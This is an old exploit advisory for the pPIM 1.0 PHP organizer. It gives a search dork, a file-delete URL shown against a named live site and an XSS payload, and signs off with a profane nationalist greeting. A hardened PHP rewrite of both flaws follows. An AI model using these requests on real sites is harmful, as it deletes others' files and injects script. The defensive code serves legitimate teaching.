pPIM 1.0 - Arbitrary File Delete / Cross-Site Scripting



Platform: PHP
Date: 2008-08-10


##########################################################
#Author : BeyazKurt
#Contact : Djm-sut@Hotmail.Com
#
#Script : Ppim v1.0 [What kind of script name is this, ffs :D ]
#Download : http://scripts.ringsworld.com/organizers/ppim.zip
#
# D0rk :  inurl:events.php?listallevents
#
# File Delete Vulnerability: upload.php
#
# Example:http://creawebs.com.mx/sistema/upload.php?mode=delfile&file=Creando Wiki.pptx
# Exploit:http://SITE.COM/upload.php?mode=delfile&file=FileName
#
# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
#
# XSS Vulnerability: events.php
#
#[CODE]
#  <?php
#  if (isset($_GET['date']))
#  {
#    $date_id = $_GET['date'];
#  print "<a href=\"events.php?mode=new&date=$date_id\">New Event</a><br / >";
#  }
#  ?>
#[/CODE]
#
#Exploit :
# events.php?mode=new&date=XSS CODE
# events.php?mode=new&date="><script>alert('XSS')</script>
# -------------------------------
#
#              INDEPENDENT KOSOVA (H) - Ethnic ALBANIA (H)
#  pigs for dedication : :  We Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
#                      Proud 2 Be ALBANIAN
#
# MTK : 0 - 5 : FenerBahçe (H)
#
# Note : Fuck off pala! Fucking lamer.
# Thnx : All Muslims Albanian & Turkish Coder.. And CrazyShark f0r translate.
#######################################################

# milw0rm.com [2008-08-10]
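
A hardened counterpart to the two issues above, as an added example that is not pPIM's code or the advisory author's: the events.php link with the `date` value validated and encoded, and a delete handler that no longer acts on a bare GET with a caller-supplied file name. The advisory does not show upload.php, so the function names, the digit-only date format, the session keys, the `csrf_token` field and the upload directory are assumptions.

```php
<?php
// Added example, not pPIM's code. Names, session keys and paths are assumptions.

/** Build the "New Event" link, or return '' when the date parameter is unusable. */
function new_event_link(array $query): string
{
    $date = $query['date'] ?? '';
    // Assumption: a date id is a short run of digits; everything else is dropped.
    if (!is_string($date) || !preg_match('/\A\d{1,10}\z/', $date)) {
        return '';
    }
    // Encode for the URL context first, then for the HTML attribute context.
    $href = 'events.php?mode=new&date=' . rawurlencode($date);
    return '<a href="' . htmlspecialchars($href, ENT_QUOTES, 'UTF-8') . '">New Event</a><br />';
}

/** Map a requested file name to a regular file directly inside $uploadDir, or null. */
function resolve_upload(string $uploadDir, string $name): ?string
{
    $base = realpath($uploadDir);
    if ($base === false || $name === '' || $name !== basename($name)) {
        return null; // empty name or a name containing a directory component
    }
    // realpath() resolves symlinks and "..", so the prefix check is on the real target.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || !is_file($path)
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

/** Delete only on an authenticated POST carrying the session's CSRF token. Returns an HTTP status. */
function handle_delete(array $server, array $post, array $session, string $uploadDir): int
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') return 405; // GET never changes state
    if (empty($session['user_id'])) return 401;                   // assumed login marker
    $token = $post['csrf_token'] ?? '';
    $known = $session['csrf_token'] ?? '';
    if (!is_string($token) || !is_string($known) || $known === ''
        || !hash_equals($known, $token)) return 403;
    $name = $post['file'] ?? '';
    if (!is_string($name)) return 400;
    $path = resolve_upload($uploadDir, $name);
    if ($path === null) return 404;
    return unlink($path) ? 204 : 500;
}
```

Called as `echo new_event_link($_GET);` and `http_response_code(handle_delete($_SERVER, $_POST, $_SESSION, __DIR__ . '/uploads'));`, the link is emitted only for a digit-only `date`, and a request shaped like the advisory's `upload.php?mode=delfile&file=...` GET returns 405 without touching the filesystem.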